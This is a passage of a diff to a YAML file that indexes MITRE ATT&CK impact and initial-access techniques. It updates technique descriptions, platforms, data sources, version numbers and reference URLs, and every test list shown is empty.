-        a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
-        campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
-        they may engage in proxyjacking by selling use of the victims' network bandwidth
-        and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+        availability. \n\nResource hijacking may take a number of different forms.
+        For example, adversaries may:\n\n* Leverage compute resources in order to
+        mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+        SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+        quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+        types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+        2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -59548,7 +60509,7 @@ impact:
       - Magno Logan, @magnologan, Trend Micro
       - Vishwas Manral, McAfee
       - Yossi Weizman, Azure Defender Research Team
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Consider monitoring process resource usage to determine anomalous
         activity associated with malicious hijacking of computer resources such as
@@ -59565,8 +60526,11 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.5'
+      - SaaS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'File: File Creation'
@@ -59585,99 +60549,73 @@ impact:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1496
         external_id: T1496
-      - source_name: Unit 42 Hildegard Malware
-        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
-          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
-        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
-      - source_name: CloudSploit - Unused AWS Regions
-        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
-          Retrieved October 8, 2019.
-        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
-      - source_name: Sysdig Proxyjacking
-        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
-          Chat. Retrieved July 6, 2023.
-        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
-      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
-        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
-          17, 2019.
-        url: https://securelist.com/lazarus-under-the-hood/77908/
-      - source_name: Trend Micro Exposed Docker APIs
-        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
-          via Exposed APIs. Retrieved April 6, 2021.
-        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
-      - source_name: Trend Micro War of Crypto Miners
-        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
-          Miners: A Battle for Resources. Retrieved April 6, 2021.'
-        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
-      - source_name: GoBotKR
-        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
-          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
-        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      - source_name: Sysdig Cryptojacking Proxyjacking 2023
+        description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+          and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1496
     atomic_tests: []
   T1565.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
-      created: '2020-03-02T14:27:00.693Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1565.002
-        url: https://attack.mitre.org/techniques/T1565/002
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
-        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:33:33.983Z'
+      name: Transmitted Data Manipulation
       description: |-
         Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
 
         Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Transmitted Data Manipulation
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
         can be difficult without the appropriate tools. In some cases integrity verification
         checks, such as file hashing, may be used on critical files as they transit
         a network. With some critical processes involving transmission of data, manual
         or out-of-band integrity checking may be useful for identifying manipulated
         data. '
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+      created: '2020-03-02T14:27:00.693Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/002
+        external_id: T1565.002
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1485:
     technique:
-      modified: '2023-10-03T17:30:32.192Z'
+      modified: '2024-09-25T20:46:14.641Z'
       name: Data Destruction
       description: |-
         Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
@@ -59686,7 +60624,7 @@ impact:
 
         To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
 
-        In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
+        In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -59712,9 +60650,10 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Deletion'
+      - 'Cloud Storage: Cloud Storage Modification'
       - 'Process: Process Creation'
       - 'File: File Deletion'
       - 'Image: Image Deletion'
@@ -59770,55 +60709,11 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1485
     atomic_tests: []
   T1498:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      - Containers
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Weizman, Azure Defender Research Team
-      - Vishwas Manral, McAfee
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
-      type: attack-pattern
-      created: '2019-04-17T20:23:15.105Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1498
-        url: https://attack.mitre.org/techniques/T1498
-      - source_name: FireEye OpPoisonedHandover February 2016
-        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
-        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
-          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
-          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
-      - source_name: FSISAC FraudNetDoS September 2012
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
-        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
-          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-      - source_name: Symantec DDoS October 2014
-        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
-        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
-          Retrieved April 24, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T16:01:00.510Z'
       name: Network Denial of Service
       description: |-
         Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -59833,6 +60728,10 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_contributors:
+      - Yossi Weizman, Azure Defender Research Team
+      - Vishwas Manral, McAfee
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
         service, but such response time typically requires very aggressive monitoring
@@ -59845,16 +60744,52 @@ impact:
         may be small and the indicator of an event availability of the network or
         service drops. The analysis tools mentioned can then be used to determine
         the type of DoS causing the outage and help with remediation.'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
       x_mitre_impact_type:
       - Availability
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+      created: '2019-04-17T20:23:15.105Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1498
+        external_id: T1498
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: FSISAC FraudNetDoS September 2012
+        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+      - source_name: FireEye OpPoisonedHandover February 2016
+        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+      - source_name: Symantec DDoS October 2014
+        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+          Retrieved April 24, 2019.
+        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1495:
     technique:
@@ -59922,11 +60857,10 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1490:
     technique:
-      modified: '2024-04-12T02:30:08.379Z'
+      modified: '2024-09-24T13:27:31.881Z'
       name: Inhibit System Recovery
       description: |-
         Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -59944,7 +60878,7 @@ impact:
 
         On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
 
-        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -59971,7 +60905,7 @@ impact:
       - Network
       - IaaS
       - Containers
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -60021,13 +60955,12 @@ impact:
         url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
       - source_name: disable_notif_synology_ransom
         description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
-          servers before ransom. Retrieved October 19, 2022.
-        url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+          servers before ransom. Retrieved September 12, 2024.
+        url: https://x.com/TheDFIRReport/status/1498657590259109894
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1490
     atomic_tests: []
   T1561.001:
@@ -60095,11 +61028,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1529:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T20:45:22.531Z'
       name: System Shutdown/Reboot
       description: |-
         Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. <code>reload</code>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
@@ -60164,13 +61096,12 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1529
     atomic_tests: []
 initial-access:
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -60248,7 +61179,6 @@ initial-access:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests: []
   T1195.001:
@@ -60298,11 +61228,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566.002:
     technique:
-      modified: '2024-04-15T23:51:25.037Z'
+      modified: '2024-10-15T16:06:32.591Z'
       name: 'Phishing: Spearphishing Link'
       description: |-
         Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -60341,10 +61270,10 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '2.6'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
@@ -60361,7 +61290,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: CISA IDN ST05-016
         description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
           Internationalized Domain Names. Retrieved October 20, 2020.'
@@ -60400,12 +61329,11 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.002
     atomic_tests: []
   T1566.001:
     technique:
-      modified: '2024-01-31T14:09:27.066Z'
+      modified: '2024-10-15T16:42:01.552Z'
       name: 'Phishing: Spearphishing Attachment'
       description: "Adversaries may send spearphishing emails with a malicious attachment
         in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -60467,7 +61395,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Unit 42 DarkHydrus July 2018
         description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
           Targets Middle East Government. Retrieved August 2, 2018.
@@ -60484,7 +61412,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.001
     atomic_tests: []
   T1195.003:
@@ -60514,7 +61441,7 @@ initial-access:
         the adversary a high degree of control over the system. Hardware backdoors
         may be inserted into various devices, such as servers, workstations, network
         infrastructure, or peripherals.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:05:10.755Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Hardware Supply Chain
       x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -60528,7 +61455,6 @@ initial-access:
       - 'Sensor Health: Host Status'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1091:
     technique:
@@ -60591,12 +61517,11 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests: []
   T1195:
     technique:
-      modified: '2024-02-26T14:23:37.009Z'
+      modified: '2024-10-04T11:17:00.778Z'
       name: Supply Chain Compromise
       description: "Adversaries may manipulate products or product delivery mechanisms
         prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -60671,7 +61596,7 @@ initial-access:
         description: Schneider Electric. (2018, August 24). Security Notification
           – USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
           Retrieved May 28, 2019.
-        url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+        url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
       - source_name: Trendmicro NPM Compromise
         description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
           to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -60685,19 +61610,18 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1195
     atomic_tests: []
   T1190:
     technique:
-      modified: '2023-11-28T21:27:35.373Z'
+      modified: '2024-09-24T14:33:53.433Z'
       name: Exploit Public-Facing Application
       description: |-
         Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
 
-        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
 
-        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
 
         Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
 
@@ -60723,7 +61647,7 @@ initial-access:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '2.5'
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -60778,7 +61702,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1659:
     technique:
@@ -60841,11 +61764,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
